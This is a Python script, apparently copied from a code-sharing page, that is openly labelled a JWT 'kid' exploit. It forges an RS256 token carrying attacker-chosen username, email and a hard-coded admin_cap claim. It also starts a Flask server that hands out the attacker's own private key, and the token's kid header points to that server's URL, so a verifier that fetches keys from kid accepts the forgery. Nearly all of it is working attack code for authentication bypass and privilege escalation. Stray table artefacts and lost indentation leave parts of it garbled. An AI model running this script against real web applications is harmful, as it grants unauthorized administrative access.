JWT KID exploit, ensure Flask (`flask`) and PyJWT (`pyjwt`) are installed before running
"""JWT KID exploit, ensure Flask (`flask`) and PyJWT (`pyjwt`) are installed before running""" | |
import jwt | |
from flask import Flask | |
# Port the key-serving Flask app listens on when the operator gives none.
DEFAULT_PORT = 8000
# Visual separator for console output.
DIV = "".join("-" for _ in range(32))
print("JWT KID exploit" + "\n" + DIV)
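def get_port(default: "int | None" = None) -> int:
    """Prompt for the TCP port the key server should listen on.

    The original returned the raw prompt string (despite the ``-> int``
    annotation); this version converts and range-checks it so callers get a
    real port number.

    Args:
        default: port returned when the operator just presses Enter; falls back
            to the module-level ``DEFAULT_PORT`` when ``None``.

    Returns:
        The chosen port as an ``int``.

    Raises:
        ValueError: if the entered value is not an integer, or not in 1..65535.
    """
    fallback = DEFAULT_PORT if default is None else default
    raw = input(f"Port ({fallback}): ").strip()
    if not raw:
        return fallback
    # input() hands back text; convert here so app.run() and the kid URL get a
    # number rather than whatever was typed.
    port = int(raw)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    return port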
def get_key() -> str:
    """Prompt for a file path and return that file's full text.

    The prompt asks for a PEM RSA private key because the token below is
    signed with RS256; nothing here validates that the file actually is one —
    a wrong file surfaces later as a signing error.
    """
    key_path = input("Path to RSA PRIVATE KEY: ")
    with open(key_path, "r") as handle:
        contents = handle.read()
    return contents
app = Flask(__name__)

# Host the target will be told to fetch the key from (it ends up in the `kid` header).
hostname = input("Hostname/IP: ")
port = get_port()
key = get_key()

# Forge the token: a normal RS256 signature with our own private key, plus a
# `kid` header that is a URL pointing at the server this script starts. A
# verifier that dereferences `kid` over HTTP to obtain key material will fetch
# our key and accept the signature.
# NOTE(review): the `admin_cap` claim is hard-coded; it only matters if the
# target authorises on that claim name — confirm against the target.
claims = {
    "username": input("Username: "),
    "email": input("Email: "),
    "admin_cap": True,
}
kid_url = f"http://{hostname}:{port}"
token = jwt.encode(claims, key, "RS256", headers={"kid": kid_url})
@app.route("/") | |
def index(): | |
return key | |
# Show the forged token, then block serving the key until interrupted.
# NOTE(review): app.run() is given no host, so it binds Flask's default
# (loopback) address, while the token's `kid` URL names `hostname`:`port`.
# Unless the target runs on this same machine it cannot reach the key here —
# confirm the bind address matches what the target will resolve.
banner = "\n".join(
    [
        DIV,
        "Token generated successfully, please set this as your jwt cookie:",
        "",
        f"{token}",
        "",
        f"The web server is all setup in this token and is running at http://127.0.0.1:{port}",
        DIV,
    ]
)
print(banner)
app.run(port=port)